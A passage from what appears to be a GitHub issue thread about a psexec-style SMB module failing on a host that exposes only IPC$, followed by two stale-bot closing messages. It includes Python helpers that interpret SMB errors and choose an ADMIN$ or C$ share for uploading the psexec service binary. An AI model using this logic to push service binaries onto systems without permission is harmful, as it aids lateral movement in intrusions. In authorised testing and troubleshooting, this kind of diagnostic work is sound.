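    if cmd == SMB_COM_OPEN_ANDX and status == "STATUS_OBJECT_PATH_SYNTAX_BAD":
        return ("not a disk share: IPC$ only carries named pipes, so no file "
                "(service binary or powershell.exe check) can be opened on it")
    return f"{status} during SMB command 0x{cmd:02X}"


# One row of the table `smbclient -L` prints: name, type, optional comment.
SHARE_LINE_RE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)\b\s*(.*?)\s*$")


def parse_smbclient_shares(listing):
    """Return [(name, type, comment), ...] from `smbclient -L HOST` output."""
    return [m.groups() for m in map(SHARE_LINE_RE.match, listing.splitlines()) if m]


DISK_PREFERENCE = ("ADMIN$", "C$")   # assumed order; ADMIN$ maps to %SystemRoot%


def pick_psexec_share(shares):
    """Choose a share that can receive the service binary, or None.

    Only 'Disk' shares qualify; IPC$ and printers are skipped outright. Write
    access to a non-admin disk share still has to be confirmed separately.
    """
    disk = {name.upper(): name for name, typ, _ in shares if typ == "Disk"}
    for cand in DISK_PREFERENCE:
        if cand in disk:
            return disk[cand]
    return next(iter(disk.values()), None)


# Constructed samples: a host exposing only IPC$ (the situation reported in
# this thread) and a normal workstation with its admin shares.
LISTING_IPC_ONLY = """
        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       Remote IPC
"""
LISTING_WITH_ADMIN = """
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Printer1        Printer   HP LaserJet
"""

# The two error lines from the module output in this thread.
THREAD_ERRORS = [
    "[-] 10.10.10.2:445 - The server responded with error: "
    "STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)",
    "[-] 10.10.10.2:445 - The server responded with error: "
    "STATUS_OBJECT_PATH_SYNTAX_BAD (Command=45 WordCount=0)",
]

if __name__ == "__main__":
    for line in THREAD_ERRORS:
        print(line.split(" - ", 1)[1], "\n  ->", triage_error(line))
    for listing in (LISTING_IPC_ONLY, LISTING_WITH_ADMIN):
        shares = parse_smbclient_shares(listing)
        print([name for name, _, _ in shares], "->", pick_psexec_share(shares))
```

Run it before launching the module: when the picker returns None the psexec stage cannot succeed regardless of how the kernel stage goes, and the SHARE option should only ever be pointed at a share of type Disk.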
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.